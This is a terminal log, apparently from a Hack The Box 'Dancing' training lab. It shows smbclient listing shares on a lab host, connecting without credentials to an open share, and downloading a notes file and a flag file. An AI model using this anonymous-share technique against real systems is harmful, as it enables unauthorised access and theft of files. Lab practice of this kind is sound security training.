┌──(kali㉿kali)-[~/…/hack_the_box/starting_point/tier0/Dancing]
└─$  smbclient -L 10.129.198.14
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.198.14 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available                                                                 
┌──(kali㉿kali)-[~/…/hack_the_box/starting_point/tier0/Dancing]
└─$ smbclient \\\\10.129.198.14\\WorkShares
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Mar 29 04:22:01 2021
  ..                                  D        0  Mon Mar 29 04:22:01 2021
  Amy.J                               D        0  Mon Mar 29 05:08:24 2021
  James.P                             D        0  Thu Jun  3 04:38:03 2021

                5114111 blocks of size 4096. 1732665 blocks available
smb: \> cd Amy.J\
smb: \Amy.J\> ls
  .                                   D        0  Mon Mar 29 05:08:24 2021
  ..                                  D        0  Mon Mar 29 05:08:24 2021
  worknotes.txt                       A       94  Fri Mar 26 07:00:37 2021

                5114111 blocks of size 4096. 1732665 blocks available
smb: \Amy.J\> get worknotes.txt
getting file \Amy.J\worknotes.txt of size 94 as worknotes.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \Amy.J\> cd ..
smb: \> cd James.P\
smb: \James.P\> ls
  .                                   D        0  Thu Jun  3 04:38:03 2021
  ..                                  D        0  Thu Jun  3 04:38:03 2021
  flag.txt                            A       32  Mon Mar 29 05:26:57 2021

                5114111 blocks of size 4096. 1732649 blocks available
smb: \James.P\> get flag.txt 
getting file \James.P\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \James.P\> exit
                                                                 
┌──(kali㉿kali)-[~/…/hack_the_box/starting_point/tier0/Dancing]
└─$ ls
flag.txt  service_scan_port  worknotes.txt
                                                                 
┌──(kali㉿kali)-[~/…/hack_the_box/starting_point/tier0/Dancing]
└─$ cat worknotes.txt              
- start apache server on the linux machine
- secure the ftp server
- setup winrm on dancing                                                                  
┌──(kali㉿kali)-[~/…/hack_the_box/starting_point/tier0/Dancing]
└─$ cat flag.txt                   
**********************